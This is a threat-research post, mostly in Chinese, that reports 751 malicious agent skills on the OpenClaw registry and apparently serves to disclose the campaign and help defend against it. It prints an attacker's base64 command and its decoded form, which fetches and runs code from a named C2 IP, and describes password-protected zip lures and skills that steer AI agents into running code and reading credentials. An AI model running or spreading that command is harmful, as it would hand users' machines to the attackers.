751 Malicious Skills Found on OpenClaw: Inside a Coordinated Supply Chain Attack
We scanned 56,480 AI agent skills on OpenClaw and found 751 distributing active malware. Three coordinated threat actors. Base64-encoded C2 callbacks. Password-protected zip files. The largest known AI agent supply chain attack.
摘要
掃描 OpenClaw 上 56,480 個 SKILL.md 檔案,發現 **751 個 skills(1.3%)正在散佈惡意軟體**。至少三個協同的攻擊者正在大量上傳偽裝成合法工具的有毒 skills。攻擊手法包括密碼保護的 zip 檔、base64 編碼的 shell 指令、以及直接連到 C2 伺服器 IP `91.92.242.30` 的回呼。
發現經過
2026 年 4 月 10-14 日期間,我們使用 ATR(Agent Threat Rules)v2.0.0 引擎掃描了五個公開 registry 上共 96,096 個 AI agent skills 和 MCP server 定義。OpenClaw 的結果最令人震驚:751 個 skills 包含活躍的惡意軟體散佈指令。
這些不是理論上的風險。它們是針對安裝這些 skills 的機器設計的實際攻擊載荷。
攻擊者
**hightower6eu** 發布了 354 個 skills,全部有毒。每個 skill — Solana 錢包、Google Workspace 工具、以太坊追蹤器 — 都要求使用者下載一個密碼保護的 zip 檔「openclaw-agent」(密碼:`openclaw`)。密碼保護的目的是繞過防毒軟體掃描。
**sakaen736jih** 發布了 212 個 skills,198 個有毒。偽裝成圖片生成工具,指示 macOS 使用者執行:
echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC90amp2ZTlpdGFycmQzdHh3KSI=' | base64 -D | bash解碼後是:`/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"` — 直接從 C2 伺服器下載並執行任意程式碼。
**52yuanchangxing** 發布了 137 個 skills,99 個有毒。中文的商業工具,使用類似的攻擊手法。
這代表什麼
AI agent skill registries 就是新的 npm/PyPI — 而且正在重蹈供應鏈安全的覆轍,防護更少。差別在於:agent skills 可以指示 AI 助理執行程式碼、讀取憑證、存取檔案系統,而且沒有傳統的沙箱隔離。
OpenClaw 有 56,000+ 個 skills。1.3% 是活躍的惡意軟體。這不是理論風險 — 這是進行中的攻擊行動。
偵測方法
ATR 使用確定性的 regex 模式匹配偵測到這次攻擊 — 不需要 LLM 推論。56,480 個 skills 的掃描在 3 分鐘內完成。觸發的規則:ATR-00121(惡意程式碼)、ATR-00120(提示詞注入)、ATR-00135(資料外傳 URL)、ATR-00162(憑證竊取組合)、ATR-00163(隱藏覆寫指令)。
你該怎麼做
1. 如果你使用 OpenClaw skills:用 `npx agent-threat-rules scan` 審計你已安裝的 skills
2. 在網路邊界封鎖 C2 IP `91.92.242.30`
3. 永遠不要在沒有先解碼的情況下執行 skill 安裝指令中的 base64 編碼指令
4. 拒絕任何要求下載密碼保護壓縮檔的 skill
完整報告:[github.com/Agent-Threat-Rule/agent-threat-rules](https://github.com/Agent-Threat-Rule/agent-threat-rules/blob/main/docs/research/openclaw-malware-campaign-2026-04.md)
---
*由 [ATR (Agent Threat Rules)](https://github.com/Agent-Threat-Rule/agent-threat-rules) 偵測 — AI agent 安全的開放偵測標準。113 條規則。MIT 授權。*